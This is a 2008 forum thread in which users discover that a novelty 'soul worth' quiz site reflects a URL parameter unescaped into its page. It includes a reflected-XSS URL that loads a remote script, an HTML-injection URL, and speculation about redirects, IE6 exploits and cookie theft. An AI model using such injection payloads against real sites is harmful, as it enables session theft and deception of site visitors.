----------------------------------- Aziz Wed Jul 30, 2008 11:59 am How much are you worth? ----------------------------------- I am about $260k. Check it out: http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=263090 It's been the hit on IRC lately... ----------------------------------- Dan Wed Jul 30, 2008 12:01 pm RE:How much are you worth? ----------------------------------- I am worth: http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=%3Cscript%20src=%22http://tinyurl.com/5a785n%22%3E XSS is bad for your cookies. Do you part in perventing rick role attacks, parse your input! ----------------------------------- DemonWasp Wed Jul 30, 2008 1:33 pm RE:How much are you worth? ----------------------------------- @Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar. I'm apparently worth squat: http://www.howmuchisyoursoulworth.com/results.html?earned_points=71605 (You can rip out the &radiog##=on nonsense and it doesn't have any effect) ----------------------------------- Tony Wed Jul 30, 2008 3:03 pm RE:How much are you worth? ----------------------------------- Page source tells me the max I can be worth is ----------------------------------- DemonWasp Wed Jul 30, 2008 3:20 pm RE:How much are you worth? ----------------------------------- That only applies as long as you don't have Firebug, though, Tony...you can modify the value of hidden inputs (or show them, etc) with the flick of a button. I sense someone about to post a screen cap of them being worth a million soul bucks. ----------------------------------- Aziz Wed Jul 30, 2008 3:27 pm RE:How much are you worth? ----------------------------------- That input has nothing to do with it, though: http://www.howmuchisyoursoulworth.com/results.html?earned_points=999999999999999999 ----------------------------------- Tony Wed Jul 30, 2008 3:29 pm Re: How much are you worth? ----------------------------------- Just a million? http://www.howmuchisyoursoulworth.com/results.html?earned_points=%3Cblink%3EGoogol%3C/blink%3E Don't even need Firebug to inject arbitrary HTML into the page. ----------------------------------- DemonWasp Wed Jul 30, 2008 3:36 pm RE:How much are you worth? ----------------------------------- Ah, my bad. I thought the max-value hidden input was on the final page, but clearly not. It clearly doesn't even make an attempt to make sure you entered something valid - strings instead of ints? Come on! It's great when pages have no validation. ----------------------------------- Tony Wed Jul 30, 2008 5:16 pm RE:How much are you worth? ----------------------------------- Not just strings, but full out HTML. The "number" is rendered by something alone the lines of document.write(whatever_url_argument) Meaning one could inject their own javascript into the page and essentially make that page do whatever they wanted. Which is exactly what Dan has done. ----------------------------------- LaZ3R Wed Jul 30, 2008 6:26 pm RE:How much are you worth? ----------------------------------- edit: Woops... posted really long link and ruined the page horizontally ... my bad :D ----------------------------------- Dan Wed Jul 30, 2008 9:11 pm Re: RE:How much are you worth? ----------------------------------- @Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar. Yes and no, althought this page it's self does not have any valuable cookies to steal i could still inject an expolite for old versions of IE and take out a few IE 6 users or just redirect to a shock site and piss people off ;) Using javascript you coudl also change any content on the page to give peoleop a false idea of what the page aucatly says. And if you are realy smart you might be able to make it make the client atack another site.